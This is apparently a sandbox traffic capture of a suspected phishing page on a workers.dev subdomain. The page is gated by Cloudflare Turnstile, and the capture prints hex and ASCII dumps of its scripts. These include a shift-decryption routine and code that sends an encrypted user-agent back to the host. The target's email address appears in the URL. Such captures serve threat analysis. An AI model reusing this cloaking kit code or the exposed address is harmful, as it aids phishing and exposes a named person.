v){return v===s},f[hi(820)]=hi(991),f[hi(379)]=function(s,v){return s>v},g=f,g[hi(1589)](e,Error))?(h=e[hi(1752)],e[hi(1438)]&&g[hi(933)](typeof e[hi(1438)],g[hi(820)]))&&(l=e[hi(1438)][hi(546)]('\n'),g[hi(379)](l[hi(1570)],1))&&(m=/^\s*at\s+(.+):(\d+):(\
2025-01-14 16:14:06 UTC	1369	IN	Data Raw: 62 4d 3f 28 62 4f 3d 30 2c 62 50 5b 68 71 28 34 39 37 29 5d 28 6e 5b 68 71 28 34 30 38 29 5d 28 62 51 2c 62 52 29 29 2c 62 53 3d 30 29 3a 62 54 2b 2b 2c 62 4b 2b 2b 29 3b 66 6f 72 28 62 55 3d 62 56 5b 68 71 28 34 36 32 29 5d 28 30 29 2c 62 57 3d 30 3b 38 3e 62 58 3b 62 5a 3d 6e 5b 68 71 28 39 34 31 29 5d 28 6e 5b 68 71 28 31 38 32 36 29 5d 28 63 30 2c 31 29 2c 31 2e 35 31 26 63 31 29 2c 63 32 3d 3d 63 33 2d 31 3f 28 63 34 3d 30 2c 63 35 5b 68 71 28 34 39 37 29 5d 28 63 36 28 63 37 29 29 2c 63 38 3d 30 29 3a 63 39 2b 2b 2c 63 61 3e 3e 3d 31 2c 62 59 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 63 62 3d 31 2c 63 63 3d 30 3b 63 64 3c 63 65 3b 63 67 3d 6e 5b 68 71 28 31 30 33 37 29 5d 28 63 68 2c 31 29 7c 63 69 2c 63 6a 3d 3d 63 6b 2d 31 3f 28 63 6c 3d 30 2c 63 Data Ascii: bM?(bO=0,bP[hq(497)](n[hq(408)](bQ,bR)),bS=0):bT++,bK++);for(bU=bV[hq(462)](0),bW=0;8>bX;bZ=n[hq(941)](n[hq(1826)](c0,1),1.51&c1),c2==c3-1?(c4=0,c5[hq(497)](c6(c7)),c8=0):c9++,ca>>=1,bY++);}else{for(cb=1,cc=0;cd<ce;cg=n[hq(1037)](ch,1)\|ci,cj==ck-1?(cl=0,c
2025-01-14 16:14:06 UTC	1369	IN	Data Raw: 34 30 31 29 5d 2c 64 5b 69 67 28 31 32 34 31 29 5d 29 29 7b 69 66 28 64 5b 69 67 28 38 39 33 29 5d 28 64 5b 69 67 28 35 34 30 29 5d 2c 69 67 28 31 37 36 31 29 29 29 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 66 42 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 21 5b 5d 7d 7d 29 2c 66 44 3d 21 5b 5d 2c 21 66 34 28 67 4a 28 31 30 39 35 29 29 26 26 28 67 31 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 51 2c 63 2c 64 2c 65 29 7b 69 51 3d 67 4a 2c 63 3d 7b 27 67 55 57 4e 6a 27 3a 69 51 28 31 33 39 35 29 2c 27 67 48 6c 4f 75 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2d 67 7d 2c 27 54 77 67 4e 44 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 6b 74 55 43 74 27 3a 66 75 6e 63 74 Data Ascii: 401)],d[ig(1241)])){if(d[ig(893)](d[ig(540)],ig(1761)))clearInterval(fB);else return![]}}),fD=![],!f4(gJ(1095))&&(g1(),setInterval(function(iQ,c,d,e){iQ=gJ,c={'gUWNj':iQ(1395),'gHlOu':function(f,g){return f-g},'TwgND':function(f){return f()},'ktUCt':funct
2025-01-14 16:14:06 UTC	1369	IN	Data Raw: 29 7d 63 61 74 63 68 28 6a 29 7b 72 65 74 75 72 6e 20 67 33 28 67 34 28 65 29 29 7d 7d 2c 67 36 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6a 35 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 29 7b 66 6f 72 28 6a 35 3d 67 4a 2c 66 3d 7b 27 78 49 59 75 75 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 72 51 76 6b 64 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 68 61 56 47 78 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 54 71 53 43 63 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d 6d 7d 2c 27 57 74 45 62 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 25 6d 7d 7d 2c 6b 2c 68 3d 33 32 2c 6a 3d 66 Data Ascii: )}catch(j){return g3(g4(e))}},g6=function(c,j5,f,g,h,i,j,k){for(j5=gJ,f={'xIYuu':function(l,m){return l+m},'rQvkd':function(l,m){return l+m},'haVGx':function(l,m){return l(m)},'TqSCc':function(l,m){return l-m},'WtEbn':function(l,m){return l%m}},k,h=32,j=f
2025-01-14 16:14:06 UTC	1369	IN	Data Raw: 72 6e 20 68 2d 69 7d 2c 27 76 79 62 45 72 27 3a 6a 37 28 31 35 34 37 29 2c 27 7a 4f 54 45 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 58 76 71 67 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 65 62 54 75 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 67 69 51 68 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 52 73 78 62 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 6e 6a 48 47 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 6d 55 52 61 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b Data Ascii: rn h-i},'vybEr':j7(1547),'zOTEt':function(h,i){return h(i)},'Xvqgu':function(h,i){return h<i},'ebTuj':function(h,i){return h(i)},'giQhz':function(h,i){return h!=i},'RsxbP':function(h,i){return h==i},'njHGp':function(h,i){return h&i},'mURah':function(h,i){
2025-01-14 16:14:06 UTC	1369	IN	Data Raw: 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 6a 61 28 36 37 31 29 5d 28 48 3c 3c 31 2c 4f 29 2c 64 5b 6a 61 28 31 32 36 34 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 6a 61 28 34 39 37 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 6a 61 28 34 36 32 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 6a 61 28 31 34 37 35 29 5d 28 31 36 2c 73 29 3b 48 3d 64 5b 6a 61 28 36 37 31 29 5d 28 48 3c 3c 31 2e 31 33 2c 31 2e 32 31 26 4f 29 2c 64 5b 6a 61 28 37 39 37 29 5d 28 49 2c 64 5b 6a 61 28 31 37 30 35 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 6a 61 28 34 39 37 29 5d 28 64 5b 6a 61 28 31 31 32 38 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 Data Ascii: {for(O=1,s=0;s<F;H=d[ja(671)](H<<1,O),d[ja(1264)](I,j-1)?(I=0,G[ja(497)](o(H)),H=0):I++,O=0,s++);for(O=C[ja(462)](0),s=0;d[ja(1475)](16,s);H=d[ja(671)](H<<1.13,1.21&O),d[ja(797)](I,d[ja(1705)](j,1))?(I=0,G[ja(497)](d[ja(1128)](o,H)),H=0):I++,O>>=1,s++);}D

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:06 UTC	739	OUT	GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:06 UTC	240	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:06 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 901eeac908b8728a-EWR alt-svc: h3=":443"; ma=86400
2025-01-14 16:14:06 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:06 UTC	646	OUT	GET /favicon.ico HTTP/1.1 Host: 5eedab40.shaullerica.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://5eedab40.shaullerica.workers.dev/?email=adrianmarsh@nhs.net Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:06 UTC	774	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9NazHnczLGOcMANykGRqQeeoJKCHPs3DOkr7Eq6ZAxuCo9INIOiBy4OAYUQCtkJGy3777MXq1O7xVqA9DIx7%2ByZJPMabwUOZvl9KxUbBRBzzliMGcEUpH9%2BIJpBtEQYOblTyucTmlxc9OgU4zInqCpFBGw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901eeacaf96c0f53-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=76902&min_rtt=71858&rtt_var=37034&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2859&recv_bytes=1224&delivery_rate=26022&cwnd=204&unsent_bytes=0&cid=4347f44eca0a8a39&ts=3166&x=0"
2025-01-14 16:14:06 UTC	595	IN	Data Raw: 31 36 36 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 20 0a 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 0a 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: 166b<!doctype html><html lang="en-US"><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-sc
2025-01-14 16:14:06 UTC	1369	IN	Data Raw: 41 41 41 41 41 34 74 42 54 4d 58 59 30 4a 46 6b 6d 6c 43 22 2c 20 0a 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 3a 20 76 65 72 69 66 79 43 61 6c 6c 62 61 63 6b 5f 43 46 2c 0a 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 68 68 32 28 65 6e 63 72 79 70 74 65 64 54 65 78 74 2c 20 73 68 69 66 74 29 20 7b 0a 20 20 20 20 20 20 6c 65 74 20 64 65 63 72 79 70 74 65 64 54 65 78 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 65 6e 63 72 79 70 74 65 64 54 65 78 74 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 20 63 20 3d 20 65 6e 63 72 79 70 74 65 64 54 65 78 74 5b 69 5d 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 63 2e 6d 61 74 Data Ascii: AAAAA4tBTMXY0JFkmlC", callback: verifyCallback_CF, }); }; function hh2(encryptedText, shift) { let decryptedText = ""; for (let i = 0; i < encryptedText.length; i++) { let c = encryptedText[i]; if (c.mat
2025-01-14 16:14:06 UTC	1369	IN	Data Raw: 29 20 7b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 75 73 65 72 41 67 65 6e 74 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 45 6e 63 72 79 70 74 65 64 55 73 65 72 41 67 65 6e 74 20 3d 20 45 6e 63 72 79 70 74 28 75 73 65 72 41 67 65 6e 74 2c 20 50 55 42 4c 49 43 5f 4b 45 59 29 3b 0a 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 53 65 6e 64 69 6e 67 20 72 65 71 75 65 73 74 20 77 69 74 68 20 65 6e 63 72 79 70 74 65 64 20 75 73 65 72 2d 61 67 65 6e 74 3a 27 2c 20 45 6e 63 72 79 70 74 65 64 55 73 65 72 41 67 65 6e 74 29 3b 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 6c 65 74 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 78 68 72 2e 6f Data Ascii: ) { const userAgent = navigator.userAgent; const EncryptedUserAgent = Encrypt(userAgent, PUBLIC_KEY); console.log('Sending request with encrypted user-agent:', EncryptedUserAgent); let xhr = new XMLHttpRequest(); xhr.o
2025-01-14 16:14:06 UTC	1369	IN	Data Raw: 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 7d 2e 66 6f 6f 74 65 72 2c 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 Data Ascii: on:none;color:#0051c3}a:hover{text-decoration:underline;color:#ee730a}.main-content{margin:8rem auto;width:100%;max-width:60rem}.footer,.main-content{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{display:flex;flex:1;flex-direction:column;align-it
2025-01-14 16:14:06 UTC	1045	IN	Data Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 7d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 68 31 20 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 Data Ascii: round-color:#222;color:#d9d9d9}a{color:#fff}a:hover{text-decoration:underline;color:#ee730a}}</style><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="h1 zone-name-title"> <div>
2025-01-14 16:14:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:06 UTC	433	OUT	GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901eeac43f625e71&lang=auto HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:07 UTC	331	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:07 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 113670 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 901eeacddb2b4369-EWR alt-svc: h3=":443"; ma=86400
2025-01-14 16:14:07 UTC	1038	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a Data Ascii: fication%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_refresh":"Refresh","time_check_cached_warning":
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 2c 66 4b 2c 66 55 2c 67 35 2c 67 39 2c 67 61 2c 67 62 2c 67 65 2c 67 66 2c 67 63 2c 67 64 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 33 36 37 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 31 34 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 36 38 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 39 38 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 39 35 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 33 33 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 38 34 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 Data Ascii: ,fK,fU,g5,g9,ga,gb,ge,gf,gc,gd){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(367))/1+-parseInt(gI(1014))/2+-parseInt(gI(1168))/3(-parseInt(gI(1098))/4)+parseInt(gI(595))/5(parseInt(gI(1033))/6)+-parseInt(gI(684))/7+-parseInt(g
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 42 2c 45 29 29 3f 28 46 3d 6f 5b 67 4e 28 33 36 32 29 5d 28 27 73 27 2c 45 29 26 26 21 67 5b 67 4e 28 31 36 39 39 29 5d 28 68 5b 44 5d 29 2c 6f 5b 67 4e 28 31 30 32 30 29 5d 28 6f 5b 67 4e 28 36 32 38 29 5d 2c 69 2b 44 29 3f 6f 5b 67 4e 28 38 35 36 29 5d 28 73 2c 69 2b 44 2c 45 29 3a 46 7c 7c 73 28 69 2b 44 2c 68 5b 44 5d 29 29 3a 73 28 69 2b 44 2c 45 29 3a 28 48 3d 6f 5b 67 4e 28 38 31 30 29 5d 28 67 2c 68 29 2c 6f 5b 67 4e 28 31 35 38 36 29 5d 28 74 79 70 65 6f 66 20 48 2c 67 4e 28 31 35 36 34 29 29 26 26 48 28 44 2c 42 29 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 67 4f 29 7b 67 4f 3d 67 4e 2c 4f 62 6a 65 63 74 5b 67 4f 28 36 37 38 29 5d 5b 67 4f 28 31 37 32 32 29 5d 5b 67 4f 28 37 31 32 29 5d 28 6a 2c Data Ascii: B,E))?(F=o[gN(362)]('s',E)&&!g[gN(1699)](h[D]),o[gN(1020)](o[gN(628)],i+D)?o[gN(856)](s,i+D,E):F\|\|s(i+D,h[D])):s(i+D,E):(H=o[gN(810)](g,h),o[gN(1586)](typeof H,gN(1564))&&H(D,B)),C++);return j;function s(G,H,gO){gO=gN,Object[gO(678)][gO(1722)][gO(712)](j,
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 27 65 76 65 6e 74 27 3a 68 6c 28 31 33 39 33 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 6c 28 37 34 38 29 5d 5b 68 6c 28 39 37 39 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 6c 28 37 34 38 29 5d 5b 68 6c 28 31 30 38 35 29 5d 2c 27 63 6f 64 65 27 3a 68 6c 28 31 36 32 31 29 2c 27 72 63 56 27 3a 65 4d 5b 68 6c 28 37 34 38 29 5d 5b 68 6c 28 31 32 32 37 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 36 37 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 68 6d 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 3d 28 68 6d 3d 67 4a 2c 7b 27 62 4d 47 77 62 27 3a 68 6d 28 31 30 31 32 29 2c 27 62 4a 59 58 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 Data Ascii: 'event':hl(1393),'cfChlOut':eM[hl(748)][hl(979)],'cfChlOutS':eM[hl(748)][hl(1085)],'code':hl(1621),'rcV':eM[hl(748)][hl(1227)]},'*'))},g)},eM[gJ(674)]=function(f,g,h,hm,i,j,k,l,m,n,o,s,x,B,C,D,E,F){i=(hm=gJ,{'bMGwb':hm(1012),'bJYXo':function(G,H){return G
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 34 39 30 29 5d 3d 4a 53 4f 4e 5b 68 6d 28 31 31 37 31 29 5d 28 66 5b 68 6d 28 34 39 30 29 5d 2c 4f 62 6a 65 63 74 5b 68 6d 28 35 30 30 29 5d 28 66 5b 68 6d 28 34 39 30 29 5d 29 29 3a 66 5b 68 6d 28 34 39 30 29 5d 3d 4a 53 4f 4e 5b 68 6d 28 31 31 37 31 29 5d 28 66 5b 68 6d 28 34 39 30 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 34 27 3a 44 5b 68 6d 28 31 31 37 33 29 5d 28 68 6d 28 31 30 32 34 29 2c 68 6d 28 31 37 31 34 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 35 27 3a 46 3d 69 5b 68 6d 28 34 35 35 29 5d 28 69 5b 68 6d 28 31 35 32 33 29 5d 28 69 5b 68 6d 28 31 35 32 33 29 5d 28 68 6d 28 31 32 31 39 29 2b 6c 2b 69 5b 68 6d 28 31 35 30 31 29 5d 2c 31 29 2b 69 5b 68 6d 28 33 38 36 29 5d 2c 65 4d 5b 68 6d 28 37 34 38 29 5d 5b 68 6d 28 Data Ascii: 490)]=JSON[hm(1171)](f[hm(490)],Object[hm(500)](f[hm(490)])):f[hm(490)]=JSON[hm(1171)](f[hm(490)]);continue;case'14':D[hm(1173)](hm(1024),hm(1714));continue;case'15':F=i[hm(455)](i[hm(1523)](i[hm(1523)](hm(1219)+l+i[hm(1501)],1)+i[hm(386)],eM[hm(748)][hm(
